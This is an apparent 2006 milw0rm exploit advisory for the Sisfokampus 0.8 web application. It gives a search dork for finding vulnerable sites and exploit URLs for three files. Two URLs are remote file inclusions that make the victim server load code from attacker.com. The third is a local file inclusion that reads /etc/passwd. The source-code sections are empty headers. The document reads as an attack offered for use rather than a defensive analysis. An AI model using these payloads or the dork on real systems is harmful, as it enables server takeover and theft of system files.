# Source Code = Sisfokampus 0.8 # # Website = www.Sisfokampus.net # # Author = E. Setio Dewo (setio_dewo@telkom.net) # # Dorkz : Allinurl: /index.php?exec= # File Vuln : index.php # print.php # download.php ( Local File Include ) # # Found by : Wawan Firmansyah a.k.a Ang|n angkaramurka2003@yahoo.com ############################################################################### # Source of index.php -------------------------[Line 27]----------------------------- -------------------------[Line 31]------------------------------ # Source Of print.php -------------------------[Line 15]------------------------------ -------------------------[Line 25]------------------------------- # Source Of download.php -------------------------[Line 1]-------------------------------- -------------------------[Line 8]-------------------------------- ################################################################################## # Exploit of index.php http://www.victim.com/index.php?exec=http://attacker.com/evilcode.txt? # Exploit of print.php http://www.victim.com/print.php?print=http://attacker.com/evilcode.txt? or http://www.victim.com/index.php?exec=print&print=http://attacker.com/evilcode.txt? # Exploit of download.php http://www.victim.com/index.php?exec=download&dir=/etc/passwd ################################################################################## Greatz : K-159 ( Thanks for ur Support & Advice ) #cyberbox community in dal.net #indolinux in dal.net #edp in dal.net ################################################################################## # milw0rm.com [2006-11-25]